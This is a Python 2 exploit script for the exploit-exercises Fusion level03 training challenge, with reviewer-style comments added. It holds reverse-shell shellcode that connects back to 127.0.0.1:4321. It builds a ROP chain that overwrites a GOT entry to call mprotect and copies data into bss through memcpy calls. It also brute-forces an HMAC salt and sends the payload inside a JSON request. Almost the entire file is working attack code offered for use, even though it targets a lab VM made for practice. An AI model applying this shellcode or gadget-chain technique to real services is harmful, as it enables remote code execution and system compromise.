
exploit-exercises fusion level03

cd80 cd80 2014.11.01 17:59
from cd80 import *
import hmac
import hashlib
import time
# Connect to the level03 service. makeCon presumably comes from the cd80 star
# import and returns a socket-like object with recv/send/close.
s = makeCon("192.168.81.140", 20003)
# NOTE(review): eval() on data read from the peer executes whatever the peer
# sends as Python code. If the token is a plain string literal, ast.literal_eval
# would parse it without that exposure; left as-is because the server's reply
# format is not visible in this script.
token = eval(s.recv(4096))
print token

# LHOST=127.0.0.1 LPORT=4321
# Author-supplied 32-bit shellcode, left byte-for-byte as written (68 bytes, so
# the 4-byte padding in the encoder below never triggers for it). The pushed
# bytes \x7f\x00\x00\x01 (127.0.0.1) and \x10\xe1 (0x10e1 == 4321) are what the
# LHOST/LPORT line above refers to.
shellcode = "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd" +\
"\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\x7f\x00\x00" +\
"\x01\x68\x02\x00\x10\xe1\x89\xe1\xb0\x66\x50\x51\x53\xb3" +\
"\x03\x89\xe1\xcd\x80\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62" +\
"\x69\x6e\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80"
# Keep the original packing helper (presumably cd80's p, via the star import)
# under a second name: the "def p" below shadows the imported p but still uses it.
pack = p
def p(num):
    """Pack *num* with the module's original ``pack`` helper and render it as
    two JSON-style unicode escapes (each written with a doubled backslash).

    The packed value is split into two byte pairs; each pair becomes one
    ``%02x%02x`` hex group (first byte, then second byte) behind the escape
    prefix, and the two groups are concatenated in order.
    """
    raw = pack(num)
    # Byte pairs start at offsets 0 and 2 of the 4-byte packed value.
    groups = ["\\\\u%02x%02x" % (ord(raw[k]), ord(raw[k + 1])) for k in (0, 2)]
    return ''.join(groups)

####encode shellcode####
# Pad to a whole number of 4-byte words up front (this mutates the module-level
# shellcode, exactly as the per-chunk padding did), then encode one word per
# chunk: up() turns the 4 bytes into an integer and p() renders it as escapes.
shellcode += "\x00" * (-len(shellcode) % 4)
shellcode_encoded = ''.join(
    p(up(shellcode[off:off + 4])) for off in range(0, len(shellcode), 4))

####end of encoding####


##### GOT OVERWRITE & make mprotect(gContents, 0x1000, 7) in bss#####
#####
##### socket -> mprotect
##### setsockopt -> &gContents
#####
#####
# Gadget chain: one 4-byte stack slot per p() call. The addresses are the
# author's values for this level03 binary and the inline labels are theirs;
# the banner above describes the intent of the chain.
payload = p(0x8049a4f) # pop ebx; ret
payload += p(0xaaa9b898) # socket@GOT(0x804bd5c) - 0x5d5b04c4
payload += p(0x8049b4f) # pop eax; add esp, 0x5c; ret
payload += p(0xffffab80) # (mprotect - socket)&0xffffffff
# 0x5c/4 is Python 2 integer division (== 23): the filler slots that the
# "add esp, 0x5c" above skips over. Under Python 3 this would be a float and fail.
payload += p(0x41414141)*(0x5c/4)
payload += p(0x80493fe) # add [ebx + 0x5d5b04c4], eax; ret
payload += p(0x8048e60) # memcpy@PLT
payload += p(0x804a26d) # pppr
payload += p(0x804bd94) # dest : setsockopt@GOT
payload += p(0x804bdf4) # src : unsigned char *gContents
payload += p(4)
##### construct mprotect(gContents, 0x1000, 7) in bss #####
# Source addresses for the bytes copied into bss, one memcpy per entry. The -1
# entry is a placeholder that the loop below replaces with the current page_id
# value (the author's "-1 for page id").
memcpy_bytes = [0x8048ae4, 0x8049082, 0x804857a, 0x8048179, 0x80485a9, 0x804857a, 0x80481d4, -1, 
                        0x804bdf6, 0x80481d4, 0x804814c, 0x80481d4, 0x80481d4, 0x8048a08, 0x80481d4, 
                        0x80481d4, 0x80481d4]
# Byte count copied from the matching memcpy_bytes entry (same length, 17 entries).
memcpy_index = [1, 1, 2, 1, 1, 2, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1]
#0x10 ~ 0xf0
# One source address per page; the outer loop runs once per entry (15 of them).
page_id = [0x804814c, 0x8048984, 0x80486c4, 0x8048ae4, 0x8048dac, 0x8048b24, 0x8048e8c, 0x80481a0,
               0x8048d37, 0x8048c5c, 0x8048d77, 0x80481bf, 0x8048a04, 0x8048a24, 0x8048d0c]
bss = 0x804be3c
idx = 0  # write cursor into bss; advanced by the length of every memcpy emitted
# Each inner iteration appends one memcpy(bss+idx, src, n) call frame:
# memcpy@PLT, the author's "pppr" gadget as its return address, then dst/src/n.
for i in range(0, 15):  # 15 is hard-coded; it must stay equal to len(page_id)
    for j in range(0, len(memcpy_index)):
        payload += p(0x8048e60) # memcpy@PLT
        payload += p(0x804a26d) # pppr
        payload += p(bss+idx)
        if memcpy_bytes[j] == -1:
            payload += p(page_id[i])
        else:
            payload += p(memcpy_bytes[j])
        payload += p(memcpy_index[j])
        idx += memcpy_index[j]
# Same call-frame shape, three more copies appended right after the page data.
setsockopt_bytes = [0x8048984, 0x804bdad, 0x804857a]
setsockopt_index = [1,1,2]
for i in range(0, len(setsockopt_index)):
    payload += p(0x8048e60)
    payload += p(0x804a26d)
    payload += p(bss+idx)
    payload += p(setsockopt_bytes[i])
    payload += p(setsockopt_index[i])
    idx += setsockopt_index[i]
    
# Per the author's labels: load ebp with bss-4, then leave; ret, so execution
# continues with what the memcpy calls above assembled at bss.
payload += p(0x8049207) # pop ebp; ret
payload += p(bss-4)
payload += p(0x8049431) # leaveret

##### END OF GOT OVERWRITE #####

# Request body: the token on its own line, then a JSON object whose "title"
# carries the filler plus the gadget chain and whose "contents" carries the
# encoded shellcode. The closing '"}//' is reproduced exactly as the author wrote it.
title_value = "a" * 127 + "\\\\u6161" + "A" * 31 + payload
request = ''.join([
    token,
    '\n',
    '{',
    '"serverip": "127.0.0.1", ',
    '"title": "' + title_value + '", ',
    '"contents": "' + shellcode_encoded,
    '"}//',
])
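# Proof-of-work: the server presumably accepts the request only when
# HMAC-SHA1(token, request + salt) starts with two zero bytes, so search for a
# 32-bit salt (2**16 tries expected). The original sent the request even if the
# loop exhausted the search space, leaving i at 0x100000000; now an exhausted
# search raises instead, and the socket is closed on every path.
nowhash = 0
salt = None
i = 0
start = time.time()
while i <= 0xffffffff:
    nowhash = hmac.new(token, request + p(i), hashlib.sha1).digest()
    if ord(nowhash[0]) == 0 and ord(nowhash[1]) == 0:
        print "checksum done in %d seconds. salt : %d" % (time.time() - start, i)
        salt = i
        break
    if not i % 10000:
        # Progress line every 10000 candidates; %d truncates the float seconds.
        print "Trying...%d [ %d seconds elapsed ]" % (i, time.time() - start)
    i += 1

try:
    if salt is None:
        raise RuntimeError("no salt found in the 32-bit search space")
    # The salt is appended in the same escaped form p() uses for every other word.
    s.send(request + p(salt))
finally:
    s.close()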
